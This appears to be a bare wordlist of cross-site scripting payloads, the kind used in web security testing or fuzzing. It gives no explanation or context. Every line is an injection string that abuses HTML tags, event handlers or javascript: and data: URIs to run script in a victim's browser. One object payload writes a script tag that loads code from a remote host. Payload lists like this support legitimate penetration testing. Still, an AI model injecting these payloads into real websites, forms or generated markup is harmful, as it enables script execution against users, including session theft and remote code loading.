'" x=s>xss</s
<svg><script ==>alert(1)</script ?
<img/src/onerror=alert(1)>
<object data="data:text/html,<svg/onload=alert(1)>">
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<object data='javascript:document.write("<script src=//1.1><\/script>");'></object>
<object id=x data="javascript:$('#x').html('<script>alert(1);<\/script>');">
<form><button/formaction=javascript:alert(1)>sublimt
<input/value=x oncut=alert(1)>
<input/type=image src=0 onerror=alert(1)>
<input/onblur=alert(1) autofocus>
<iframe src="javascript:prompt(1)">
<iframe/srcdoc="&lt;svg/onload=alert(1)&gt;"></iframe>
<img/src=="x onerror=alert(1)//">
<audio/src="x" onloadstart=alert(1)></audio>
<video><source onerror=alert(1)>
<svg><script/xlink:href=data::,alert(1)></script
<style><img src="</style><img src=x onerror=alert(1)//">
<svg><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"><circle r="400"></circle><animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" /></a>
<object/data=javascript:alert(1)>
<img/src=x:prompt(0) onerror=eval(src)>
